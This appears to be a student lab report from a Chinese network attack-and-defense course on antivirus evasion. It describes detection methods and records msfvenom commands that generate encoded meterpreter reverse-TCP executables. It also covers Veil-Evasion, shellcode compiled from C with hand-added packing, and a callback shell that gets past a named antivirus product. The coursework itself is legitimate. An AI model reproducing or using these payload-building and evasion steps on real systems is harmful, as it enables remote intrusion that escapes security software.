20145204《网络对抗》免杀原理与实践
实践内容说明
(1)理解免杀技术原理(1分)
(2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(2分)
(3)通过组合应用各种技术实现恶意代码免杀(1分)
(4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分)
基础问题回答
- 杀软是如何检测出恶意代码的?
主要是基于三点:特征码、启发式恶意软件检查和行为。
- 免杀是做什么?
将恶意软件变身,使得查杀软件认不出来,从而免于被检测、拦截。
- 免杀的基本方法有哪些?
针对杀毒软件的三种基本检测方法,我们可有以下几种方法实现免杀:
1、改变特征码:使用不同语言或者不同软件进行编码,或者加压缩壳,加密壳。
2、 改变行为:从通讯方式和操作模式两方面来说。
1)就通讯方式而言,我们可以使用反弹式连接、隧道技术或者加密通讯数据。
2)在操作模式上,尽量减少对操作系统的修改,将全部动作放在内存中,或者加入混淆作用的正常功能代码。
实践总结与体会
- 关于Msfvenom
利用Msfvenom编码器对病毒加壳,并没有起到多大的作用,即使编译多次也无效果,可见Msfvenom中的编码器早已被各家杀软盯上了。
- Veil-Evasion
Veil-Evasion在加壳比Msfvenom要好用一些(有可能是因为比较新),在实验中比较发现,其生成的病毒被查杀的概率小。
离实战还缺些什么技术或步骤?
1、被感染的靶机和我们不在一个网段,就不能成功。
2、伪装生成的exe,诱使用户自己点击开启。
实践过程记录
使用Msfvenom
1、在使用编码器之前,我们先查杀一下msfvenom直接生成meterpreter可执行文件,结果如下图所示,可以看到查杀率为53%(21/39):
2、使用msfvenom -l encoders 查看msf中包含的编码器如下图所示,我们在这里挑选两个,进行试验比较其生成的木马的被查杀率的区别。
3、使用shikata_ga_nai编码生成:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘x00’ LHOST=10.43.48.166 LPORT=4444 -f exe > zyj_encoded.exe
查杀率并没有降低,结果如下图所示:
4、使用xor编码生成:msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor ‘x00’ LHOST=10.43.51.205 LPORT=4444 -f exe > zyj_xor.exe,查杀率没有任何变化。
使用Veil-Evasion生成可执行文件
1、老师kali账号下已经下载好了Veil-Evasion文件,直接在命令行中输入veil-evasion打开。按照提示选择use,并选择相应的payload方式。这里选择的是49.如下图所示;
2、输入generate生成病毒,按照提示输入文件名称,结果如下图所示:
2、将生成好的文件上传到这里,看查杀率相比较Msfvenom确实提高不少。如下图所示:
半手工打造:C语言调用Shellcode
1、直接在linux中利用msf的meterpreter生成的文件以.c形式文件存储,得到机器码。命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.43.48.16 LPORT=443 -f c >c5204.c
2、改变这个.c文件,并编译,竟然锐减到10%,但是仍然没有用,此文件依然会被认为是病毒。
结果文件:
5、继续加工该程序,手工加一个壳,将特征码倒序,再次查杀,果真半手工的还收有效果的:
最后在自己电脑上实现杀毒并回连
1、瑞星杀软(版本24.00.63.33)杀不出:
2、打开瑞星防火墙,会提示可疑软件在上网,同意后,就能连上kali了。
2、回连成功,在kali上获得shell(中间虚拟地址ip发生变化,所以重新生成的exe):
